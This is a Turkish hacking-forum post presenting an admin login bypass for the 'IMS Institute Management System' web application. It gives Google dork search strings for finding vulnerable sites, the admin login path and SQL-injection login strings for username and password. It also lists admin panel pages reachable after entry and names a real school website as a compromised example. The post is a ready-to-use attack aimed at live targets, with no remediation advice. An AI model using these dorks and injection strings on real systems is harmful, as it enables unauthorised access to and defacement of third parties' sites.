Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Ims Institute Management JsitPark Admin Bypass Vuln
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 56
Yaşam Puanı: 1,382 / 1,382
Deneyim: 31 / 100
Rep Sayısı: 2826
Mesaj Sayısı: 6459
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Ims Institute Management JsitPark Admin Bypass Vuln
21.06.2018 22:09
################################################################################​#################

# Exploit Title : © IMS Institute Management System by JS IT Park 2017-18 Version 1.0.1 Admin Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 22/06/2018
# Vendor Homepage : codecanyon.net/item/ims-institute-management-system/19414428
+ codecanyon.net/item/ims-pro-institute-management-system/20773196
# Tested On : Windows
# Version : 1.0.1
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 [ Authentication Bypass Issues ]

################################################################################​#################

# Google Dorks :

intext:''© IMS - Institute Management System by JS IT Park 2017-18 | Version 1.0.1''

intext:''Developed by JS IT Park''

# Administration Control Panel Path : /admin/login.php

# Exploit :

Username : '=''or'

Password : '=''or'

# Useable URL Paths in the Control Panel :

/admin/index.php
/ems/
/admin/profile.php
/admin/website_settings.php
/admin/website_logo.php
/admin/create_page.php
/admin/page_list.php
/admin/subpage_list.php
/admin/new_slider.php
/admin/slider_list.php
/admin/add_slider_text.php
/admin/service_section.php
/admin/update_service.php
/admin/gallery_section.php
/admin/gallery_list.php

################################################################################​#################

# Example Site : sbccomilla.edu.bd => Proof of Concept => archive.is/Bq57f

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################

# Cyberizm Digital Security Technological Turkish Moslem Army #
# İnsanda bir organ vardır. Eğer o sağlıklı ise bütün vücut sağlıklı olur;
eğer o bozulursa bütün vücut bozulur. Dikkat edin! O, kalptir.
[ Hz.Muhammed S.A.V ] #


Alinti



1 Ziyaretçi